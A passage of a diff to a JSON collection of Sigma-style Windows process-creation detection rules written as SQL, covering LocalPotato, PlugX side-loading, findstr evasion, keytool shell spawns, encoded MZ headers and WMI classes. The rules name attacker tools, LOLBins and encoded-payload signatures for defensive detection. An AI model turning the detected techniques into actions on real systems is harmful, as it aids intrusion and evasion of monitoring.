CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "status": "test", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Administrative findstr usage" ], - 
"level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Non Interactive PowerShell Process Spawned", + "id": "f4bbd493-b796-416e-bbf2-121235348529", + "status": "test", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "System 
administrator usage" + "Legitimate programs executing PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_powershell_non_interactive_execution.yml" }, { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + 
"filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 
'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of an executable that is 
typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1574.002" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE 
'%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource 
Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "status": "experimental", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE 
'%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + 
"title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "test", + 
"description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "GPO" + "Various applications", + "Tools that include ping or nslookup command invocations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": 
